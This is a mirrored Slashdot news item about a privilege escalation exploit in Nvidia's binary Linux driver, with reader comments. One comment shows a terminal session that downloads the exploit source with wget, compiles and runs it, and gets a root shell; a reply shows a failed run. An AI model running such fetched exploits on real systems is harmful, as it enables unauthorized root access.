Slashdot Mirror


Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole

An anonymous reader writes "The Nvidia binary driver has been exploited by an anonymous hacker, who reported it to Nvidia months ago and it was never fixed. Now the exploit was made public." The one releasing the exploit (relayed to him anonymously) is David Airlie, a well-known X hacker. The bug lets the attacker write to any part of memory on the system by shifting the VGA window; the attached exploit uses this to attain superuser privileges. It appears that this has been known to Nvidia for at least a month.

11 of 180 comments

  1. Use Windows by h910 · Score: 5, Funny

    Use Windows and you don't get Linux malware. True story, mod +5 true accordingly.

    1. Re:Use Windows by broginator · Score: 5, Funny

      That's like saying "Drive Fords, that way you won't crash in a Chevy."

      --
      s/[stupid comments]/[intelligent discourse]/gi
  2. Open Source Advantage by Nerdfest · Score: 5, Insightful

    I'd like to say that this would not have happened with an open source driver, but that's not necessarily true. It would almost definitely have been patched by now though.

    1. Re:Open Source Advantage by Dagger2 · Score: 5, Funny

      Clearly the proprietary driver is much better then, since it allows me to do whatever I like with your computer.

  3. Re:A view to a kill. by greg1104 · Score: 5, Informative

    VGA maps the video card's memory into the regular CPU address space so that applications can read and write directly to it. That's the VGA window being referenced here. Removing that is further complicated by wanting to retain compatibility with older video standards (CGA, EGA).

  4. Re:Who did he send it to at Nvidia? by Anonymous Coward · Score: 5, Insightful

    Maybe people need to stop being apologists for this kind of thing...

    Companies don't just hand out the email address for the head of their SW development division; maybe if they did we could let the right people know. I emailed a random Joe when I found an issue with a site, and it got escalated up and it got fixed.

    Maybe if Nvidia had better quality random Joes, when this sort of stuff did pass by them it would get escalated and not deleted.

  5. works here by Anonymous Coward · Score: 5, Informative

    It's certainly legit..

    c@v:~$
    c@v:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin ...
    2012-08-01 12:46:13 (60.8 KB/s) - `86747-001.bin' saved [18225/18225] ...
    c@v:~$ mv 86747-001.bin nvid-root.c
    c@v:~$ gcc nvid-root.c -o nvid-root
    c@v:~$ ./nvid-root
    [*] IDT offset at 0xc1808000
    [*] Abusing nVidia...
    [*] CVE-2012-YYYY
    [*] 32-bits Kernel found at ofs 0
    [*] Using IDT entry: 220 (0xc18086e0)
    [*] Enhancing gate entry...
    [*] Triggering payload...
    [*] Hiding evidence...
    [*] Have root, will travel..
    sh-4.2#
    sh-4.2#

    sh-4.2# id
    uid=0(root) gid=0(root) groups=0(root),4(adm),6(disk),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),104(fuse),105(lpadmin),115(admin),116(sambashare),119(pulse-access),1000(chad)
    sh-4.2#

    sh-4.2# lsb_release -a
    LSB Version: core-2.0-ia32:core-2.0-noarch:core-3.0-ia32:core-3.0-noarch:core-3.1-ia32:core-3.1-noarch:core-3.2-ia32:core-3.2-noarch:core-4.0-ia32:core-4.0-noarch
    Distributor ID: Ubuntu
    Description: Ubuntu 12.04 LTS
    Release: 12.04
    Codename: precise

    sh-4.2# uname -a
    Linux vero 3.2.0-24-generic-pae #39-Ubuntu SMP Mon May 21 18:54:21 UTC 2012 i686 i686 i386 GNU/Linux
    sh-4.2#

    1. Re:works here by dmitrygr · Score: 5, Informative

      64-bit 2.6.38.8 kernel with nvidia driver 280.13 doesn't work:

      [*] IDT offset at 0xffffffff81b60000
      [*] Abusing nVidia...
      [*] CVE-2012-YYYY
      [*] 64-bits Kernel found at ofs 0
      [*] Using IDT entry: 220 (0xffffffff81b60dc0)
      [*] Enhancing gate entry...
      [*] Triggering payload...
      [*] Hiding evidence...
      callsetroot returned fffffffffffffffe (-2)
      [*] Failed to get root.

      --
      -------
      1. Enjoy your job
      2. Make lots of money
      3. Work within the law

      Choose any two.
  6. Re:Who did he send it to at Nvidia? by nedlohs · Score: 5, Informative

    Yeah you don't get more flimsy evidence than a working exploit.

  7. Re:Nvidia rotten to the core by fuzzyfuzzyfungus · Score: 5, Insightful

    Somebody should probably tell Nvidia that a driver that enables arbitrary memory read/write could probably be used as a DRM circumvention mechanism if targeted at a 'protected' program rather than the kernel. That might actually get them to fix it...

  8. Re:Hoooo boy... by Anonymous Coward · Score: 5, Insightful

    Correct. That's why I choose AMD.

    Not that they're that much better, but at least they tried to.